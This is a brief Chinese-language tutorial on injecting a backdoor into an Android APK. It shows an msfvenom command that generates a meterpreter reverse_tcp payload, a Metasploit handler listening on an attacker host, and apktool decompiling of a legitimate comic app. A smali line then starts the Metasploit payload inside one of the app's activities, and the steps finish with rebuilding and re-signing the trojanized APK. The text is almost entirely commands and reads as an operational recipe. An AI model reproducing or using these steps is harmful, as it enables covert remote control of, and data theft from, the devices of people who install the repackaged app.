Apk注入后门

https://ibotpeaches.github.io/Apktool/install/https://www.oracle.com/java/technologies/javase-jdk16-downloads.html

msfvenom -p android/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=6663 -o 1.apk

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcppayload => android/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST x.x.x.xLHOST => x.x.x.xmsf6 exploit(multi/handler) > set LPORT 6663LPORT => 6663msf6 exploit(multi/handler) > exploit -z -j

java -jar apktool.jar d 1.apkjava -jar apktool.jar d kemi.apk

/root/APP/kemi/smali/com/icomico/comi/activity/

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

java -jar apktool.jar b kemi

生成签名keytool -genkey -v -keystore android.keystore -alias android.keystore -keyalg RSA -validity 20000添加签名bin/jarsigner -verbose -keystore android.keystore -signedjar 123_yqm.apk kemi.apk android.keystore